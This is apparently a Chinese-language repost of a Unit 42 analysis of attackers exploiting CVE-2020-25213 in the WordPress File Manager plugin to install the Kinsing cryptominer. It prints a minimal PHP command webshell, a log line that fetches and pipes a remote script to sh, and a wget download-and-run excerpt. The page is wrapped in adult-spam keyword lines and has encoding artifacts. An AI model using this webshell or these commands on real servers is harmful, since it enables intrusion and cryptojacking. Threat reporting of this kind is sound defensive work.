成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

CVE-2020-25213漏洞在野利用

安全
2020年12月,Unit 42研究人員發(fā)現(xiàn)有攻擊者嘗試?yán)肳ordPress File Manager(文件管理器)插件中的文件上傳漏洞。

[[381498]]

 2020年12月,Unit 42研究人員發(fā)現(xiàn)有攻擊者嘗試?yán)肳ordPress File Manager(文件管理器)插件中的文件上傳漏洞。攻擊者成功利用該漏洞可以以任意文件名和擴展上傳任意文件,引發(fā)目標(biāo)web 服務(wù)器上的遠(yuǎn)程代碼執(zhí)行。

攻擊者利用該漏洞利用來安裝webshell,然后該webshell 被用來安裝Kinsing惡意軟件,該惡意軟件會從H2miner 家族運行惡意加密貨幣挖礦機。Kinsing是用Golang編程語言開發(fā)的,最終的目標(biāo)是用于容器環(huán)境中的加密貨幣劫持攻擊。

CVE-2020-2513和Webshells

CVE-2020-2513漏洞產(chǎn)生的原因是WordPress文件管理器插件將elFinder庫的connector.minimal.php.dist 文件擴展名改成了.php,所以該文件可以直接執(zhí)行。但是因為該文件沒有訪問限制,因此任何瀏覽該web 服務(wù)器的用戶都可以執(zhí)行。該文件包含無需認(rèn)證就上傳文件到web服務(wù)器的機制。由于該漏洞,任何人都可以上傳文件,因此惡意攻擊者就利用該機制來上傳webshell,可以用來進(jìn)行下一步的惡意軟件安裝或加密貨幣挖礦活動。

攻擊鏈

研究人員調(diào)查發(fā)現(xiàn)被攻擊的機器中有以下日志信息,其中發(fā)給Web服務(wù)器的HTTP POST請求有:

  1. [19/Dec/2020:08:58:08 +0000] “POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1” 200 1453 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36” 

該請求用來上傳webshell。研究人員進(jìn)一步分析發(fā)現(xiàn)了惡意webshell:

  1. [19/Dec/2020:08:57:48 +0000] “GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1” 200 411 

從上圖中可以發(fā)現(xiàn),該webshell名為k.php,并提供了一個執(zhí)行的命令。該webshell 本身非常簡單,是在web 服務(wù)器上明文保存的,并且不含有任何的混淆和認(rèn)證措施:

  1. < ?php if(isset($_REQUEST['cmd']){ echo "< pre >"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "< /pre >"; die; }? > 

研究人員進(jìn)一步分析返回給webshell k.php的HTTP GET請求,發(fā)現(xiàn)該命令調(diào)用了下載名為wpf.sh文件的curl 命令,并執(zhí)行該文件。

研究人員從攻擊者的C2 服務(wù)器中獲得了該shell腳本,文件內(nèi)容如下:

  1. $WGET $DIR/kinsing http://X.X.X.X/kinsing 
  2. chmod +x $DIR/kinsing 
  3. … 
  4. SKL=wpf $DIR/kinsing 
  5. … 

 wpf.sh文件是一個使用wget下載Kinsing的腳本,給予該腳本執(zhí)行權(quán)限,并執(zhí)行。

總結(jié)

研究人員發(fā)現(xiàn)了WordPress 文件管理器遠(yuǎn)程代碼執(zhí)行漏洞 CVE-2020-25213 的在野利用。攻擊者利用該漏洞利用來安裝Kinsing惡意軟件,運行一個H2miner家族的惡意加密貨幣挖礦機。Kinsing的最終目標(biāo)是用于容器環(huán)境的加密貨幣劫持攻擊。

本文翻譯自:https://unit42.paloaltonetworks.com/cve-2020-25213/如若轉(zhuǎn)載,請注明原文地址。

 

責(zé)任編輯:姜華 來源: 嘶吼網(wǎng)
相關(guān)推薦

2022-08-10 18:18:20

網(wǎng)絡(luò)安全漏洞CISA

2021-05-26 09:46:26

Android漏洞

2025-04-11 08:35:00

漏洞網(wǎng)絡(luò)安全終端安全

2025-02-28 10:23:33

2020-10-12 10:28:15

漏洞內(nèi)存破壞網(wǎng)絡(luò)攻擊

2021-02-07 14:39:22

Falco漏洞安全工具

2020-12-17 10:28:27

漏洞網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)安全

2014-11-19 11:05:45

2021-09-09 15:40:46

零日漏洞IE瀏覽器微軟

2021-08-10 08:22:21

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2020-12-11 11:18:43

MiTMKubernetes漏洞

2020-12-28 10:23:00

中間人攻擊漏洞Kubernetes

2022-04-27 15:55:40

黑客漏洞網(wǎng)絡(luò)攻擊

2020-07-15 10:35:25

漏洞攻擊網(wǎng)絡(luò)安全

2024-08-19 15:07:39

2023-07-07 15:44:12

漏洞網(wǎng)絡(luò)安全

2025-05-13 08:28:00

漏洞終端安全系統(tǒng)安全

2021-09-10 11:41:20

漏洞Windows 微軟

2020-09-25 17:33:03

漏洞

2020-10-22 11:24:53

修復(fù)漏洞
點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 亚洲免费网址 | 欧美一区2区三区4区公司 | 天天操网 | 免费中文字幕 | 国产精品欧美大片 | 欧美日韩一区不卡 | 亚洲啊v在线 | 韩日在线视频 | 精品乱码一区二区三四区 | 国产一区二区三区不卡av | 中文字幕一区二区三区四区五区 | 亚洲一一在线 | 一区二区在线不卡 | 欧美国产精品 | av一区二区三区四区 | 成人在线视频免费观看 | 免费看a | 91xxx在线观看| 欧美日韩在线播放 | 精品国产18久久久久久二百 | 蜜桃精品视频在线 | 亚洲综合无码一区二区 | 日韩一区二区三区在线观看 | 国产性网 | 国产欧美精品一区二区三区 | 久久久久成人精品 | 欧美在线色| 欧美一级二级视频 | 午夜在线精品偷拍 | 国产欧美日韩一区 | 午夜电影福利 | 天天插天天狠天天透 | 五月婷婷激情网 | 欧美成人精品激情在线观看 | 国产aaaaav久久久一区二区 | 日本亚洲欧美 | 99热99| 99免费在线视频 | 日韩电影中文字幕在线观看 | 日本久久久久久久久 | av高清毛片 |